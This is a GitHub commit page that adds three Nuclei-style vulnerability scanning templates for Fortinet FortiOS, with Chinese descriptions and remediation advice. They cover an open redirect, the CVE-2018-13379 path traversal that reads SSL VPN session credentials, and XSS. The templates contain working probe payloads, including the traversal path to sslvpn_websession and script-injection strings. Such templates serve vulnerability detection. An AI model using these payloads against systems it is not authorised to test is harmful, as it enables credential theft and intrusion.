-
Notifications
You must be signed in to change notification settings - Fork 671
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
17 changed files
with
141 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,45 @@ | ||
id: CVE-2016-3978 | ||
info: | ||
name: FortiOS (Fortinet) - Open Redirect and XSS | ||
author: | ||
- l0ne1y | ||
tags: | ||
- cve | ||
- cve2016 | ||
- redirect | ||
- fortinet | ||
- fortios | ||
description: |- | ||
Fortinet FortiOS Web User Interface 跨站脚本漏洞 | ||
Fortinet FortiOS是美国飞塔(Fortinet)公司开发的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSL VPN、Web内容过滤和反垃圾邮件等多种安全功能。 | ||
Fortinet FortiOS的Web User Interface(WebUI)中存在安全漏洞。远程攻击者可借助登录时的‘redirect’参数利用该漏洞将用户重定向到任意Web站点,实施钓鱼攻击或跨站脚本攻击。以下版本受到影响:Fortinet FortiOS 5.0.13之前5.0.x版本,5.2.3之前5.2.x版本,5.4.0之前5.4.x版本。 | ||
reference: | ||
- https://seclists.org/fulldisclosure/2016/mar/68 | ||
- https://nvd.nist.gov/vuln/detail/cve-2016-3978 | ||
- http://seclists.org/fulldisclosure/2016/mar/68 | ||
- http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability | ||
severity: medium | ||
classification: | ||
cve-id: | ||
- cve-2016-3978 | ||
cwe-id: | ||
- cwe-79 | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
remediation: |- | ||
**官方修复方案** | ||
目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: | ||
https://fortiguard.com/advisory/fortios-open-redirect-vulnerability | ||
**临时修复方案** | ||
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 | ||
requests: | ||
- matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- (?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$ | ||
path: | ||
- '{{BaseURL}}/login?redir=http://www.example.com' | ||
method: GET |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2018-13379 | ||
info: | ||
name: Fortinet FortiOS - Credentials Disclosure | ||
author: | ||
- l0ne1y | ||
tags: | ||
- cve | ||
- cve2018 | ||
- fortios | ||
description: |- | ||
Fortinet FortiOS 路径遍历漏洞 | ||
Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 | ||
Fortinet FortiOS 5.6.3版本至5.6.7版本和6.0.0版本至6.0.4版本中的SSL VPN Web门户存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 | ||
reference: | ||
- https://fortiguard.com/advisory/fg-ir-18-384 | ||
- https://www.fortiguard.com/psirt/fg-ir-20-233 | ||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13379 | ||
severity: critical | ||
classification: | ||
cve-id: | ||
- cve-2018-13379 | ||
cwe-id: | ||
- cwe-22 | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
remediation: "**官方修复方案**\n目前厂商已发布升级补丁以修复漏洞,补丁获取链接:\nhttps://fortiguard.com/psirt/FG-IR-18-384\n\n**临时修复方案**\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n | ||
\ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n | ||
\ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options | ||
Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 | ||
\ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" | ||
requests: | ||
- matchers: | ||
- type: word | ||
words: | ||
- var fgt_lang | ||
path: | ||
- '{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' | ||
method: GET |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
id: CVE-2018-13380 | ||
info: | ||
name: Fortinet FortiOS Cross-Site Scripting | ||
author: | ||
- l0ne1y | ||
tags: | ||
- cve | ||
- cve2018 | ||
- fortios | ||
- xss | ||
- fortinet | ||
description: |- | ||
Fortinet FortiOS 跨站脚本漏洞 | ||
Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 | ||
Fortinet FortiOS 6.0.0版本至6.0.4版本、5.6.0版本至5.6.7版本和5.4及之前版本中的SSL VPN Web门户存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/cve-2018-13380 | ||
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html | ||
- https://fortiguard.com/advisory/fg-ir-18-383 | ||
- https://fortiguard.com/advisory/fg-ir-20-230 | ||
severity: medium | ||
classification: | ||
cve-id: | ||
- cve-2018-13380 | ||
cwe-id: | ||
- cwe-79 | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
remediation: |- | ||
**官方修复方案** | ||
目前厂商已发布升级补丁以修复漏洞,补丁获取链接: | ||
https://fortiguard.com/psirt/FG-IR-18-383 | ||
**临时修复方案** | ||
对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 | ||
requests: | ||
- matchers: | ||
- type: word | ||
condition: or | ||
part: body | ||
words: | ||
- <svg/onload=alert(1337)> | ||
- <script>alert(1337)</script> | ||
- type: word | ||
part: header | ||
negative: true | ||
words: | ||
- application/json | ||
- type: status | ||
status: | ||
- 200 | ||
matchers-condition: and | ||
path: | ||
- '{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B' | ||
- '{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E' | ||
method: GET |
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.